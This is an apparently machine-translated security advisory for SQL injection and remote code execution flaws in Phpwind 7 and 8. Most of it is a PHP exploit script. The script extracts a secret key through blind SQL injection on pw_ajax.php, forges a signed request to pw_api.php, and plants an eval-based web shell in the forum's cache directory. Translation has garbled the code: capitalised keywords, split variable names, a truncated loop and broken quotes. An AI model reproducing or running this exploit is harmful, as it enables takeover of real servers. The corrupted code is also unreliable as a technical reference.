Phpwind Multiple Remote Code Execution Vulnerabilities (phpwind SQL injection vulnerability)

Impact System

Phpwind 7
Phpwind 8

Detailed description
Phpwind 7 and 8 versions have the input verification vulnerability. Attackers can exploit this vulnerability to remotely execute arbitrary php code.

The problem exists in pw_ajax.php. Because the data submitted to the fieldname parameter lacks sufficient filtering, attackers can exploit this vulnerability to launch SQL injection attacks to obtain data in any database.

In addition, class_other.php has the arbitrary command execution vulnerability. Due to insufficient Filtering for $ class [cid] input, entering this logic requires some key, the key can be obtained through the above injection vulnerability.

PHPWind has a SQL injection vulnerability, which can be exploited by malicious people to conducting ct SQL injection attacks.

Input passed to the "fieldname" Parameter in pw_ajax.php is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

In addition Input passed to the "$ class [cid]" Parameter in class_other.php is not properly sanitised before being used in a SQL query. but in order to reach this logic code need some important key, attacker cocould exploit abve SQL injection vulnerability to get key.

Test code

Echo"

Info: Poc for Phpwind Remote Command Execution

Test: exploit. php user password http://www.blackxl.org/phpwind/

";

If ($ argc <3 ){

Echo "parameter missing ";

Die ();

}

$ User = $ argv [1];

$ Pass = $ argv [2];

$ Pwurl = $ argv [3];

$ Myheader = array (

'Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 100 ′,

'Accept-Language: zh-cn, zh; q = 100 ′,

'Accept-Charset: gb2312, UTF-8; q = 0.7, *; q = 100 ′,

'Content-Type: application/x-www-form-urlencoded; charset = UTF-8 ′,

'Referer: http://www.blackxl.org ',

'Connection: Keep-alive ',

'Cache-Control: no-cache ',

'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0;. net clr 2.0.50727; InfoPath.2 )'

);

$ Cookie = "";

$ Str = curlsend ("$ pwurl/login. php ?"," POST ", 0, $ myheader," forward = & jumpurl = http % 3A % 2F % 2F127. 0.0.1% 2 FPHPWind/upload % 2F & step = 2 & lgt = 0 & pwuser = $ user & pwpwd = $ pass & hideid = 0 & cktime = 31536000 & submit = % B5 % c7 % C2 % BC ", 1 );

Preg_match_all ("/Set-Cookie :( [^;] +)/is", $ str, $ array );

For ($ I = 0; $ I

$ Cookie = $ cookie. ";". $ array [1] [$ I];

}

// Echo $ cookie;

$ Test = curlsend ('$ pwurl/pw_ajax.php', "POST", 0, $ myheader, ", 1 );

If (strpos ($ test ,'')){

Die ('user password or other parameter error ');

}

$ Shellcode = "action = pcdelimg & fieldname = db_value % 20 from % 20pw_config % 20 where % 20db_name % 20 like % between % 20and % 20db_value % 20 like % 200x {offset} 25% 20 union % 20 select % 200x612e2e; % 23 ″;

$ Hash = "0123456789abcdef ";

$ Craked = "";

For ($ I = 0; $ I <32; $ I ++ ){

For ($ n = 0; $ n <16; $ n ++ ){

$ Tmp = str_replace ("{offset}", bin2hex ($ craked. $ hash [$ n]), $ shellcode );

$ Tmp = curlsend ("$ pwurl/pw_ajax.php", "POST", 0, $ myheader, $ tmp, 0 );

If (strpos ($ tmp, "pw_config ")){

Echo "CrackEd Offset". ($ I + 1). ":". $ hash [$ n]. ";

$ Craked = $ craked. $ hash [$ n];

Break;

}

}

}

Echo "Craked Magicdata:". $ craked ."";

Echo "Get shell :";

// Another 0day

$ Arg = ";

$ Hack = array ();

$ Hack [mode] = 'other ';

$ Hack [method] = 'threadscategory ';

$ Hack [params] = 'a: 1: {s: 3: "cid"; a: 1: {s: 3: "cid"; a: 1: {s: 3: "cid"; s: 21 :"'. eval ($ _ GET [c]). 'abc ";}}}';

$ Hack [type] = 'app ';

$ Hack = strips ($ hack );

Ksort ($ hack );

Reset ($ hack );

Foreach ($ hack as $ key => $ value ){

If ($ value & $ key! = 'Sig '){

$ Arg. = "$ key = $ value &";

}

}

$ Arg. = 'sig = '. md5 ($ arg. $ craked );

Echo file_get_contents ("$ pwurl/pw_api.php ?". $ Arg );

Echo "OK ";

$ Str = file_get_contents ("$ pwurl/data/bbscache/info_class.php? C = echo % 20Just_wooyun ;");

If (strpos ($ str, 'wooyun ')){

Echo "Got shell:". "$ pwurl/data/bbscache/info_class.php? C = phpinfo ();";

Echo "Over !";

}

Function strips ($ param ){

If (is_array ($ param )){

Foreach ($ param as $ key => $ value ){

$ Param [$ key] = strips ($ value );

}

} Else {

$ Param = stripslashes ($ param );

}

Return $ param;

}

Function curlsend ($ url, $ method = false, $ ssl = 0, $ myheader, $ data = ", $ header = 0 ){

Global $ cookie;

$ Ch = curl_init ();

$ Timeout = 0; // set to zero for no timeout

Curl_setopt ($ ch, CURLOPT_URL, $ url );

Curl_setopt ($ ch, CURLOPT_POST, $ method );

Curl_setopt ($ ch, CURLOPT_HTTPHEADER, $ myheader );

Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );

Curl_setopt ($ ch, CURLOPT_CONNECTTIMEOUT, $ timeout );

Curl_setopt ($ ch, CURLOPT_COOKIE, $ cookie );

If ($ data ){

Curl_setopt ($ ch, CURLOPT_POSTFIELDS, $ data );

}

Curl_setopt ($ ch, CURLOPT_HEADER, $ header );

If ($ ssl ){

Curl_setopt ($ ch, CURLOPT_SSL_VERIFYPEER, FALSE );

}

$ Handles = curl_exec ($ ch );

Curl_close ($ ch );

// Echo $ handles;

Return $ handles;

}

Solution
Currently, no detailed solutions are available:

Http://www.phpwind.net